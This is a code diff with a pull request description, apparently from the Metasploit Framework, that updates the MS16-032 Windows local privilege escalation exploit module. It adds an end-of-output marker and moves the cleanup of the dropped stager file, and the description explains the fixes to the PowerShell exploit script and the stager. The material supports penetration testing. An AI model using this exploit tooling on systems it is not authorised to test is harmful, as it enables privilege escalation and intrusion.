@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Local
       # Non-Windows systems are definitely not affected.
       return Exploit::CheckCode::Safe
     end
-    
+
     res = psh_exec 'if($([System.Environment]::ProcessorCount) -gt 1) { echo("true") }'
     unless res.include? 'true'
       vprint_error 'Target system has an insufficient number of processor cores'

--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@@ -126,6 +126,8 @@ class MetasploitModule < Msf::Exploit::Local
     ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
     #lpcommandLine - capped at 1024b
     ms16_032.gsub!("$args1","\"#{psh_cmd}\"")
+    end_flag = Rex::Text.rand_text_alphanumeric(32)
+    ms16_032.gsub!("$end", end_flag)
 
     print_status('Compressing script contents...')
     ms16_032_c = compress_script(ms16_032)
@@ -160,6 +162,7 @@ class MetasploitModule < Msf::Exploit::Local
 
       while(d = r.channel.read)
         print(d)
+        break if d.include? end_flag
       end
       r.channel.close
       r.close

--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@@ -169,11 +169,13 @@ class MetasploitModule < Msf::Exploit::Local
 
       print_good("Executed on target machine.")
 
-      rm_f(@upfile)
-
-      print_good("Deleted #{@upfile}")
     rescue
       print_error("An error occurred executing the script.")
     end
+  end
+
+  def cleanup
+    rm_f(@upfile)
+    print_good("Deleted #{@upfile}")
   end
 end


### PR DESCRIPTION
- Powershell script was outdated.
  Updated from https://www.exploit-db.com/exploits/39719
    
- Powershell script was buggy when current directory
  was set to e.g. C:\ProgramData. (Get-Item Error)
  Fixed.
    
- Stager was being dropped to current directory, but
  it is not guaranteed that we always have permission
  to write a file there. Use %TEMP% instead.

- Exploit only seems to work when executed under
  a powershell of the same architecture as the
  host. (Not WOW64)
  This module now ensures that no matter the
  architecture of the meterpreter, a powershell
  of the same architecture as the host is being
  run. (Using Sysnative directory when on WOW64)

- Stager was broken, now generating stager with Rex
  and dropping stager as `.ps1` instead of `.txt`.
    
  Ideally the exploit should be rewritten to
  accept a shellcode payload directly or a smaller
  stager powershell should be created so that it
  fits in under 1024 bytes and can be fed directly
  to CreateProcessWithLogonW without dropping to
  disk.

For usage see initial PR: https://github.com/rapid7/metasploit-framework/pull/7006